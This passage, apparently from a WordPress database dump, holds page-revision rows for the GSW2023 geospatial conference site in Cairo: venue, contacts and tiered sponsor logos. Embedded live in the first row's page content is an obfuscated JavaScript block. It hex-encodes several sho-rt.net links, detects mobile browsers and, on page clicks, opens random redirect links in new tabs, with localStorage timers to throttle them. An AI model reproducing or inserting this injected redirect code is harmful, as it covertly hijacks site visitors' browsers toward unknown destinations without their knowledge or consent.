vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:04:12','2023-08-16 00:04:12','',3066,'https://gsw2023.com/?p=5234',0,'revision','',0),
(5235,1,'2023-08-16 00:05:35','2023-08-16 00:05:35','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Platinum Sponsors</span></strong></h4>\r\n[vc_row_inner][vc_column_inner width=\"1/2\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n&nbsp;\r\n\r\n[/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More 